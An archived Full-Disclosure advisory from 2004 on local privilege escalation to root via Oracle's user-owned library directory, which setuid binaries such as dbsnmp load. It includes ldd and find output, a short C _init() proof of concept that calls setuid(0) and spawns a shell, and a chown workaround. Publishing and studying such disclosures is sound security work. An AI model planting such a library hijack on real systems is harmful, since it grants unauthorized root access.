lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <410A14C7.4050709@open3s.com>
From: jmpascual at open3s.com (Juan Manuel Pascual)
Subject: OPEN3S - Local Privilege Elevation through Oracle products (Unix
 Platform)

*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------
*

* Title:*    Local Vulnerability in Oracle Products. RDBMS, IAs, etc 
           *All Versions*. (10g not tested)
* Date:*     10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX  but can be exported to others. 
* Impact:*   Privilege elevation from oracle products installation owner 
           (usually called oracle or ias ) to root.
* Author:*   Juan Manuel Pascual Escriba <mailto:jmpascual@...n3s.com>
* Status:*   Vendor contacted details below. 



*INTRODUCTION:*

Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer, 
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.


*PROBLEM SUMMARY:*

This software version
	- Oracle 8i Linux Platform
	- Oracle 9i Linux Platform
	- Oracle 8i HP-UX Platform
	- Oracle 9i Solaris Platform
	- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
	- All versions tested in Unix platform (Universal??)

are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.


*DESCRIPTION*

Oracle Libraries are installed owned by oracle in a default installation of the products 
commented above.

[pask@...oniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 lbs
drwxr-xr-x  15 iasr2    dba          512 Jan  7 12:13 ldap
drwxr-xr-x   3 iasr2    dba        12800 Nov 21 11:22 lib
drwxr-xr-x  13 iasr2    dba          512 Nov 21 14:04 network
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 ocommon
...

As you can see, the lib directory owner is iasr2, let's look for some setuid binaries

[pask@...oniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo

[iasr2@...oniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s---   1 root     dba      2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@...oniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s---   1 root     dba        12632 Nov 21 14:04 ./bin/nmo

And now, just could see the shared objects that the binaries depends.

[iasr2@...oniet ora9ias_mid]$ ldd ./bin/dbsnmp
        libvppdc.so =>   /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 =>      /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so =>    /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 =>        /usr/lib/libthread.so.1
        libkstat.so.1 =>         /usr/lib/libkstat.so.1
	....

[iasr2@...oniet ora9ias_mid]$  ldd ./bin/nmo
        libnsl.so.1 =>   /usr/lib/libnsl.so.1
        libsocket.so.1 =>        /usr/lib/libsocket.so.1
        libgen.so.1 =>   /usr/lib/libgen.so.1
	.....

ups, it's not posible to achieve root privileges with this binary and by this way


For iasr2 user is too easy to create a so.lib, something like

#include 
#include 

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   setuid(0);
   system("/usr/bin/ksh");
   printf("Saliendo del Init()\n");
}


	
*IMPACT*
	
	oracle,ias,iasr2 or iasdb users with local access can gain root privileges through 
	oracle installation


*EXPLOIT*

	commented above.


*WORKAROUND*

	chown to root lib directory and parent directory.


*STATUS*

	Oracle Security Alerts explains in an email sent 26/07/2004 that  "Oracle believes that
	only trusted users should have access to the local iasdb user account".

	I have no information about a patch or a solution from Oracle Corp.




--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            jmpascual@...n3s.com
Barcelona - Denia - Spain              http://www.open3s.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040730/e44aa7ab/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ